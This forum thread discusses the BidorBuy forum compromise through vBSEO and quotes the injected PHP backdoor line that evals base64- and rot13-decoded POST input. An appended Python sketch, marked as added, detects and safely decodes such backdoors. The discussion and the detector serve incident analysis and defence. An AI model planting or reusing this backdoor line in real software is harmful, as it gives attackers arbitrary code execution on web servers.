BidorBuy forums hit with stealth hack

VBSeo...

They lost focus on their product and then kicked Ilia out (http://admin-talk.com/threads/dear-...y-vbseo-is-suspending-operations.43684/page-3)
I am waiting for more VBSeo crap like this to crop up.

Was certainly not a good way how VBSEO dealt with their internal issues. There is unfortunately more to the story than what Ilia wants to make out. Unfortunately not many different options for discussion forums and even MyBB has seen a fair share of issues on their installation (which is probably a lot worse for them as it's part of their core business).
 
^^ why does the government not have an internet spokesperson

 
Yup MD4E, and that is it actually.
How one deals with conflict, constructive criticism or downright *********ry... You can be calm and deal with it methodically, you can ignore it, or you can blame others :)

You should set up a school, teaching TheGov employees how to remove the chip on their shoulder, develop mutual respect and a decent work ethic.
 
Pesky swearword filters...

4$$h0l3ry is in fact a technical term... It's the description of a troll's behaviour. :)
 
If you're advertising, you're doomed

Magic dude etc said:
The VBSeo exploit does only affect SEO traffic and does not go beyond that - i.e. remote execution exploits or accessing file systems - either one would have not caused issues due to our environment.
This does not agree with the content posted to pastebin, which says:
PHP:
if (isset($_POST[$o])) eval(base64_decode(str_rot13($_POST[$o])));
Translation: assuming $o is initialized to some interesting value like 'o' during earlier parts of the decoding (not shown), this indicates that the attacker retained the ability to run arbitrary code specified by
PHP:
str_rot13(base64_encode($evilcode))
This is code that has the privileges of the user running php. For large single installation sites, this user is generally www-data / apache / nobody. Unless php is running in a restricted root, there are or were probably privilege escalation options available, the box is rooted already.

Turning on advertising on a compromised web site means that control has been passed down the chain to people that do not care about whether their attack is detected or not.
 
True, although the script has the capability to execute arbitrary commands via HTTP-POST, no HTTP-POST was executed against the URL. Also when looking through the injected code, '$o' was not defined anywhere. The forum server runs on its separate virtual which is chrooted/jailed and any attack would have been restricted within the jailed environment. We did audit the server for any remote execution and have not found any trace of it. The attacker was really just interested in attracting advertising revenue and nothing else.
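
For anyone auditing a site for the injected line quoted in this thread, here is an added example (not part of any post above): a Python sketch that flags `eval()` of decoded request input in PHP source and decodes a captured POST value in the order PHP would apply the functions, without executing it. The sample PHP file, the POST value and the function names are constructed for illustration.

```python
import base64
import codecs
import re

# PHP decoders commonly nested inside eval() in obfuscated backdoors, mapped to
# Python equivalents. Only the two that appear in this thread are implemented.
DECODERS = {
    "base64_decode": lambda s: base64.b64decode(s).decode("utf-8", "replace"),
    "str_rot13": lambda s: codecs.encode(s, "rot_13"),
}

# eval( f1( f2( ... $_POST[...] ) ) ): a decode chain fed directly by request input.
BACKDOOR_RE = re.compile(
    r"eval\s*\(\s*((?:\w+\s*\(\s*)+)\$_(POST|GET|REQUEST|COOKIE)\s*\[",
    re.IGNORECASE,
)

def find_backdoors(php_source):
    """Return (line_no, superglobal, chain) per hit; chain is outermost-first."""
    hits = []
    for no, line in enumerate(php_source.splitlines(), 1):
        for m in BACKDOOR_RE.finditer(line):
            chain = re.findall(r"\w+", m.group(1))
            hits.append((no, m.group(2).upper(), [f.lower() for f in chain]))
    return hits

def decode_payload(value, chain):
    """Apply the chain innermost-first, as PHP evaluates it. Never executes it."""
    for name in reversed(chain):
        if name not in DECODERS:
            raise ValueError(f"decoder not implemented: {name}")
        value = DECODERS[name](value)
    return value

# Constructed sample: the line quoted in the thread, inside a made-up file.
SAMPLE_PHP = """<?php
$title = 'forum';
if (isset($_POST[$o])) eval(base64_decode(str_rot13($_POST[$o])));
"""
# Constructed POST value, standing in for one recovered from a request-body log.
SAMPLE_POST_VALUE = "MJAbolNaqTImqPp7"

if __name__ == "__main__":
    for no, source, chain in find_backdoors(SAMPLE_PHP):
        print(f"line {no}: eval of $_{source} via {' -> '.join(chain)}")
        print("decoded:", decode_payload(SAMPLE_POST_VALUE, chain))
```

Standard access logs usually do not record POST bodies, so the decode step only applies where request bodies were captured, for example by a WAF or audit log.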
 